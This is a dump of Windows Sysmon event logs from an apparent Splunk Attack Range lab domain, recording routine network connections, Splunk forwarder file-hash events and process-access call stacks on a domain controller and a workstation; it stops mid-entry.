07:43:07.873{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50890-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001045737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:07.873{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50890-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001045736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:15.696{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D72CE0834FC9F81AC8DBD20FD3DBC5F7,SHA256=581599A2889152571934E967B223E23472042B42F3299CC6C147725266424106,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:15.713{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843D26EBBA7BB217FDBD996B0EEA1152,SHA256=10A592FAFACCF0A3EF6F62052714163A3441DF83EA536C664492664B8E09862A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:15.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6576C650EC8B80BCE4E848626A770FA,SHA256=CC4CF15AD9D9D60D9E13F7B16827893414849D1AB9DC89AFF3B6E2378D8A898B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:15.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27EB8568DABAB187E4325E7F83A75965,SHA256=00360B33C82F6EE8807D8F69981AD0DA1159ACFA5B498C58C06CBAD97B7CCDC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:13.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57142-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:16.715{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=638FA9E2252F2F071D49AF91CB12F2B2,SHA256=3AFAA1CC63DBC2808ABBF575555853EE926F0204B74CE02510171A4696F5BCC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:16.729{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEA87F8B84B8062E1E2849FD040845B2,SHA256=E3A5B545EC35255401B6BBC434CA685B9F264B21D966A73AD26713B867CF934E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:17.776{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8D1B24E206DF8190C993B4501484BE4,SHA256=2FB1C930861F2B3B4384BD460BB45E16761206D6771247648D2EC8EFB66E9F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:17.731{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58FE8E8F7D53FB014B671E81A3D50638,SHA256=BC3FA678B547AFDFF32DDDBE429F6862975974AFB79039542738ABA9BB3B6912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:17.026{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74DB58B5B5441FA4F1013BA72D16252C,SHA256=BF711EA8112F468C361C3C213DF6FB6DA5F9CA36F52818403892FBFA2B407EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:18.823{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B73BCCD196B6DE64B84806D86DDA78,SHA256=A077B8EDD6C68C35E57D1F0B6558B2358A7A3685064875FE8F05EFF9A6EB6E55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:18.746{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B051236AF1B7E6A73B09C5F51CF81B5C,SHA256=0FB624D3B7DEFBF01439A7BC7C95F3428BC6D7CC889794338B3672CCBD923F8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:18.178{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:19.823{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D1CBEC932E1768B4E9DBB712A5486DA,SHA256=CD6C77A31573FDBE53C86715DD3883A28FF3759A2B65C29172E33B587988585B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:19.778{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA0C0BB7DAD10353BC99F6CC0741CC52,SHA256=F7C79F8BEF8BD6A350686863CB732EFEBE83AAB0D06F33E1D3D420583189AABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:20.885{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF98737AF8EE7496AE0341C7650CF6B9,SHA256=010A7A81369F105E245CB647383C2FC44AA2CEB6D903D4629A893F60518F3C0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:20.778{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C4FDB005BCB137AB9638BBECF74F20,SHA256=4763C8BC04FC192333BCFCE6E986A46282D68491287A0187B38F3B8F9D2CE328,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:20.307{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:18.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57143-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001045744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:12.653{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50891-false10.0.1.12-8000- 23542300x8000000000000000805887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:21.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EB70DECB9660DD6FAB55C2F9C892C2F,SHA256=30BAEDAA4783C08CB01AD5EF5588A776A9CFD44CBB6D8AEA452B49EE4A57B8C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:21.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9C41EE2C625C9531DAD762B9BC61EC2,SHA256=71895BB5E813CD8A0FAE411B34EBE5CB89FAD643F29B10938F01BDEF78F24F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:22.844{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D267987A5D58FA83A6EC3C7B20474F92,SHA256=428631DE69F0DF62CA29EEDD851F37D19DC32E817187D73D0E1DC17523011340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:22.963{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5113310500A44E009F51496B7FDA595,SHA256=8653A632140F31B533723EDC4B6CCA7727CD06E54A236E6381654DB6FF7A7940,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:20.440{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57144-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000805890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:23.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8CEA903A33FE7D7A4EA4AA160C1D1DA,SHA256=BF594DD0250B8313FB2B46297831FEFFDB2A1C1685D7296E2B51ECBA3C35D222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:23.913{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C2B8401F68288AD18F15BEAA68095D,SHA256=2B151289938E41137AC7FD0CF82DBF0D145DC03CCC0159C955E0DC49F035899E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:24.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A64FBDFA263AE88808CB3CC421E8C668,SHA256=CF834E036EEA70907F3CCA773BA82542E2DE44F717A0700B3D1A8806DEC518ED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:24.791{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F29C-60EB-3579-00000000D001}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 